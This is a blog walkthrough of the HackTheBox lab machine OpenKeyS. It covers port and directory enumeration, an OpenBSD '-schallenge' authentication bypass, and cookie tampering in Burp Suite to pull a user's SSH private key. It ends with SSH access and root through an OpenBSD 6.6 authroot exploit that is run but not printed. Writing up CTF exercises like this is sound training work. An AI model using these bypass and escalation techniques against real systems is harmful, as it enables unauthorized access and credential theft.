OpenKeyS HackTheBox WalkThrough

OpenKeys HackTheBox WalkThrough

This is OpenKeyS HackTheBox Walkthrough. In this writeup, I have demonstrated step by step procedure how I got rooted to OpenKeyS OpenBSD htb machine. Before starting let us know something about OpenKeyS hackthebox machine. It is an OpenBSD OS machine with difficulty level medium assigned by its maker with IP address 10.10.10.199.

First of all connect your PC with VPN and confirm the connectivity by pinging the IP address 10.10.10.199. As usual I started by scanning the IP address for open ports and banner grab the services running on it. Nmap [a port scanner] gave the following result.

Scanning

$nmap -sC -sV -oN nmap_scan 10.10.10.199

Nmap scan report of  OpenKeys HackTheBox machine during WalkThrough

Port 22 and 80 is open. OpenSSH 8.1 and OpenBSD webserver is running over them respectively. Ongoing to website http://10.10.10.199 found a login page.

Login page of OpenKeys HackTheBox machine

As usual tried to login with some default credentials like admin : admin and admin : password but login failed due to wrong credential. Checked the Page Source to get information about some CMS or some important comments but did not get anything interesting. Then tried directory brute force using dirsearch (best directory brute forcing tool so far) and got this result.

Directory brute forcing

$dirsearch -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e all -t 20 -u http://10.10.10.199/

Directory Bruteforcing on OpenKeys HackTheBox  machine during WalkThrough

At URL http://10.10.10.199/includes/auth.php.swp. Got a domain jenniferopenkeys.htb. Added this to my /etc/hosts file because there may be some website running over this domain if virtual hosting is enabled. However, got the same page as http://10.10.10.199/index.php on http://jenniferopenkeys.htb/index.php. In this domain name, jennifer is present so added it to my notes in case it may be our SSH user.

swap file of OpenKeyS Htb machine

After further enumeration got this link . According to this link, an attacker can bypass the login screen if he/she login with credential -schallenge : passwd.

Authentication Bypass

OpenSSH key not found message

Successfully bypassed the login screen. And redirected to the page sshkey.php. According to the message of the page sshkey.php, OpenSSH key for the user -schallenge is missing because user -schallenge does not exist. So captured the request of page http://jenniferopenkeys.htb/index.php in burpsuite to modify the request.

Capture requests of login.php page in burpsuite

Added cookie value username=jennifer by terminating the PHPSESSID with ; (semi-colon)

Adding custom cookie after capturing the request in burp suite

After cookie addition sent the request and redirected to page sshkey.php

Follow redirection

Followed the redirection and we got the OpenSSH Private Key for user jennifer

Private keys of Jennifer captured in burpSuite

After requesting the page in browser got the SSH key.

Private SSH Key of user Jennifer in OpenKeys Htb Machine

1. Copied the private key inside the file named private_key inside my /root/.ssh/ directory.

2. Changed the permission of private_key

3. Now connect to the remote OpenKeyS machine using the private_key

$cd /root/.ssh/

$nano private_key

$chmod 600 private_key

Getting User Shell

$ssh -i private_key [email protected]

Getting User shell through SSH in OpenKeyS HackTheBox WalkThrough

Capture User Flag

$cat user.txt

OpenKeys HackTheBox Machine user flag found during walkthrough

Privilege Escalation

Finding PrivEsc Vector

Command $uname -a reveals that OpenKeyS is running kernel version 6.6. So googled openbsd 6.6 privilege escalation exploit if there exits any kernel exploit related to version 6.6 or not. Got this article. On reading this, found that OpenBSD 6.6 is vulnerable to local privilege escalation and many more.

So here, our privilege escalation vector is Vulnerable Kernel Version and a suitable kernel exploit is sufficient to escalate the privilege to root. Used this exploit to get privilege escalation.

Getting Root Shell

Used exactly the same steps as directed in the above link and got root.

Note: Try to change to home directory of user jennifer if you get error in running this exploit.

$cd /tmp

$nano openbsd-authroot   //copy & paste the content from just above link to this file

$chmod +x openbsd-authroot

$./openbsd-authroot

Privilege Escalation during OpenKeys HackTheBox WalkThrough

Capture Root Flag

$cat root.txt

OpenKeys HackTheBox Machine root flag found during walkthrough

This is how I got rooted to OpenKeyS HackTheBox. Learnt a lot from this walkthrough. Thanks for reading this article. Having any issue, write in the comment section. For any suggestion about writeup, feel free to write us at [email protected].

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am a Computer Science student. I like to share my knowledge of hacking with others. I used to write walkthrough on different challenges of HackTheBox & DVWA . In part time I do bug bounty hunting and penetration testing on websites.